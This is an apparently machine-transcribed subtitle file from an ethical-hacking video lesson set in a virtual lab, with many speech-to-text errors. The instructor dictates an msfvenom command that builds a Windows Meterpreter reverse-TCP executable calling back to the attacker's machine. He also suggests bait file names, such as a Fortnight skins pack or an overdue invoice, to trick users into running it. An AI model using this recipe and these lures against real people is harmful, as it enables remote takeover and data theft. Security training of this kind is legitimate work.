1
00:00:03,110 --> 00:00:09,320
In this lesson, we're going to learn how easy it is for an attacker to create a piece of malware that

2
00:00:09,320 --> 00:00:15,080
can infect and take control of your computer, your smartphone, your laptop, you name it.

3
00:00:15,650 --> 00:00:22,340
In fact, most people are really surprised when they see that it only takes one line of code in the

4
00:00:22,340 --> 00:00:26,960
meta split framework to create a virus that can do all the damage.

5
00:00:26,960 --> 00:00:32,210
We've been talking about taking over your webcam, looking through your files, stealing your keystrokes

6
00:00:32,210 --> 00:00:32,720
and more.

7
00:00:33,440 --> 00:00:37,330
This is one long line starts with MSF venom.

8
00:00:37,340 --> 00:00:44,030
That's the meta split framework venom, which is our payload creation tool.

9
00:00:44,390 --> 00:00:47,990
It's going to allow us to embed a payload called a Materne sprinter.

10
00:00:48,410 --> 00:00:54,410
Materne Critter is the tool that's going to give us a remote shell or complete control over a remote

11
00:00:54,410 --> 00:00:59,450
computer across the Internet from our Caleigh machine into our Windows 10 machine.

12
00:01:00,080 --> 00:01:03,650
And we're gonna see how to create this long one long line command.

13
00:01:03,900 --> 00:01:06,440
And that will create a virus so we can give a cool name.

14
00:01:06,950 --> 00:01:09,530
So let's click into our Caleigh box.

15
00:01:09,560 --> 00:01:15,620
And we've already started up the Meadow's split framework console by coming to 08 exploitation tools

16
00:01:15,920 --> 00:01:18,540
and choosing Meadow's bleep Medfly framework.

17
00:01:18,830 --> 00:01:22,580
You can also from the command line, just type in s f console.

18
00:01:22,610 --> 00:01:24,830
That's Meadow's plate framework console.

19
00:01:25,520 --> 00:01:30,230
So I'm going to use control L to clear the screen.

20
00:01:31,570 --> 00:01:36,470
And I'll increase the font size just a little bit there, and we're gonna start typing this one long

21
00:01:36,470 --> 00:01:38,360
line, that is M.

22
00:01:39,200 --> 00:01:40,740
S F venom.

23
00:01:42,350 --> 00:01:49,920
And we're going to give a payload dash P and there can be no space between the dash and the P windows.

24
00:01:50,180 --> 00:01:56,240
Slash Materne printer slash reverse underscore TCAP.

25
00:01:56,680 --> 00:01:59,270
The reverse TCAP for our Materne printer.

26
00:01:59,930 --> 00:02:05,930
Medda split interpreter Shell for Windows is going to give us a reverse TCAP connection.

27
00:02:05,930 --> 00:02:07,940
That means it's gonna call us.

28
00:02:08,270 --> 00:02:10,250
We don't have to look for machines to attack.

29
00:02:10,280 --> 00:02:16,940
We just send people this file and if they click on it, they will then give us a reverse TCAP connection.

30
00:02:16,940 --> 00:02:20,600
They'll call back to us the phone home with this virus.

31
00:02:21,500 --> 00:02:28,400
So this will create a payload of the windows Mateparae Herschelle, reverse TCAP connection back to

32
00:02:28,400 --> 00:02:29,090
our machine.

33
00:02:29,420 --> 00:02:32,900
We just need to tell it our local host address.

34
00:02:33,230 --> 00:02:38,110
Now, if you don't remember your Kelly IP address, you can just start a new shadowland type IP, A

35
00:02:38,120 --> 00:02:40,880
or IP, ADR or IP address.

36
00:02:41,330 --> 00:02:46,340
And you can see my machine has picked up a new IP address, I believe Tendo DOT ninety seven.

37
00:02:46,700 --> 00:02:49,070
That's why we always check before we run the virus.

38
00:02:49,460 --> 00:02:54,800
So we'll say L host equals and your IP address from your Caleigh machine.

39
00:02:55,280 --> 00:02:58,790
So Tim dot oh dot nine.

40
00:02:58,790 --> 00:03:01,160
Dot seven is mine.

41
00:03:01,580 --> 00:03:04,430
And I'm going to keep typing this really long command.

42
00:03:04,820 --> 00:03:12,170
We're gonna give it a dash F for a format of an executable file, a Windows executable file dash F B

43
00:03:12,170 --> 00:03:13,520
XY space.

44
00:03:13,610 --> 00:03:16,700
And we're gonna run off of this line because it's too long to fit on one.

45
00:03:17,120 --> 00:03:22,790
You can either use the backslash to automatically take you down to the next line or you can just keep

46
00:03:22,790 --> 00:03:25,070
typing if it doesn't mess you up too much.

47
00:03:25,140 --> 00:03:29,600
If you do a backslash and enter, you can continue the command or you can just keep typing.

48
00:03:30,110 --> 00:03:34,140
I'm going to do a dash output of Tilda's slash desktop.

49
00:03:34,150 --> 00:03:37,490
That will be my desktop on the Kelly box slash.

50
00:03:37,520 --> 00:03:44,090
I want to give this a really cool name because I want my intended victim, the person that I have permission

51
00:03:44,090 --> 00:03:44,760
to test.

52
00:03:44,780 --> 00:03:49,080
In this case, it's me to want to click and install that piece of software.

53
00:03:49,100 --> 00:03:56,840
So depending on the person that you're you've been hired to do security testing for, that may be funny.

54
00:03:56,840 --> 00:03:57,590
Cat videos.

55
00:03:57,590 --> 00:03:58,460
Dudi Yuxi.

56
00:03:58,460 --> 00:04:01,600
That may be a invoice.

57
00:04:01,790 --> 00:04:03,050
Dot pdaf.

58
00:04:03,050 --> 00:04:03,950
Dudi XY.

59
00:04:04,580 --> 00:04:11,060
Anything that would trick your user into clicking and opening that file, because once that person clicks

60
00:04:11,060 --> 00:04:16,160
that file, if they're not protected with a good firewall, with good antivirus, it is going to give

61
00:04:16,160 --> 00:04:18,320
you full control of that remote machine.

62
00:04:18,650 --> 00:04:20,440
So we've got our dash format XY.

63
00:04:20,450 --> 00:04:27,830
We need to use our dash o for output or the output formatted file dash, so we need to give it a good

64
00:04:27,830 --> 00:04:28,160
name.

65
00:04:28,190 --> 00:04:35,030
So we're gonna use Tilde Slash desktop and you do have to spell desktop correctly.

66
00:04:35,330 --> 00:04:41,210
In fact, the spelling is really the hardest part of this entire process since it's only takes one line

67
00:04:41,570 --> 00:04:42,650
to create a virus.

68
00:04:43,010 --> 00:04:48,140
The only catch is you've got to type that entire line correctly in one long line that wraps around two,

69
00:04:48,140 --> 00:04:50,960
a new screen so or to two new line on your screen.

70
00:04:51,350 --> 00:04:59,750
So I'm going to give this a name like fortnight, all skins or fortnight God mode or fortnight something.

71
00:04:59,990 --> 00:05:04,910
I just know that a lot of my students seem to be playing fortnight from now, from time to time.

72
00:05:05,960 --> 00:05:08,930
Fortnight underscore all scan's.

73
00:05:08,990 --> 00:05:14,450
So this is just a mod pack for a fortnight to an unsuspecting user.

74
00:05:15,320 --> 00:05:25,640
Again, like I mentioned, that might be H.R. files Dudi XY or of overdue invoice stop pdaf daudi xy

75
00:05:25,790 --> 00:05:30,170
or funny cat videos, whatever it would take to get your user to click through.

76
00:05:30,530 --> 00:05:38,030
So we've got a Meadow's Bleep Venom payload of Windows Materne Critter Reverse underscore TCAP with

77
00:05:38,120 --> 00:05:39,920
a local host address l host.

78
00:05:40,010 --> 00:05:46,820
This is the address that we want that reverse TCAP, Materne or Shell to call back to us to give us

79
00:05:46,820 --> 00:05:47,450
control.

80
00:05:48,290 --> 00:05:50,630
And the format of this file will be an executable.

81
00:05:50,630 --> 00:05:56,360
The output file will go right on our desktop as fortnight underscore all skins dot e xy.

82
00:05:56,840 --> 00:06:02,480
When you get that entire thing typed incorrectly, press enter and it should take just a couple of moments

83
00:06:02,480 --> 00:06:04,220
to generate this executable file.

84
00:06:04,220 --> 00:06:08,150
It actually only takes a few hundred bytes to be able to build.

85
00:06:08,160 --> 00:06:14,480
That meant a split, a bill that Medda interpreter Meadow's split reverse interpret interpreter that

86
00:06:14,480 --> 00:06:16,400
reverse shell into our payload.

87
00:06:16,430 --> 00:06:19,550
So it created a payload of just three hundred forty one bytes.

88
00:06:19,580 --> 00:06:22,700
That's what it takes to actually infect the other computer.

89
00:06:22,970 --> 00:06:27,620
But it put it in a file seventy two thousand eight hundred and two by seventy three thousand eight hundred

90
00:06:27,620 --> 00:06:28,040
two bytes.

91
00:06:28,310 --> 00:06:30,680
So that a 73 K file called.

92
00:06:30,910 --> 00:06:37,020
Night, all skins that will then give us that will run everything that we need to actually inject this

93
00:06:37,020 --> 00:06:41,310
Trojan into our reverse, into our remote host.

94
00:06:42,180 --> 00:06:44,400
So it says it created a file on my desktop.

95
00:06:44,430 --> 00:06:47,850
The Tilda's slash desktop was just short for home slash Caleigh.

96
00:06:47,850 --> 00:06:52,500
Or if you're on an older version of Linux, that'll be your slash route to slash desktop.

97
00:06:53,040 --> 00:07:00,900
But if we minimize this window, we should see we have a file called Fortnight All Skins Daddy XY and

98
00:07:00,900 --> 00:07:06,000
Executable File Windows Application Files sitting on our Caleigh desktop.

99
00:07:06,390 --> 00:07:11,730
When we come back in the next lesson, we're going to see how to share that remotely through a Web server

100
00:07:12,120 --> 00:07:16,860
so that we'll be able to infect our Windows machine and we'll do it all free right here from Caleigh

101
00:07:16,860 --> 00:07:19,100
in our safe virtual hacking lab.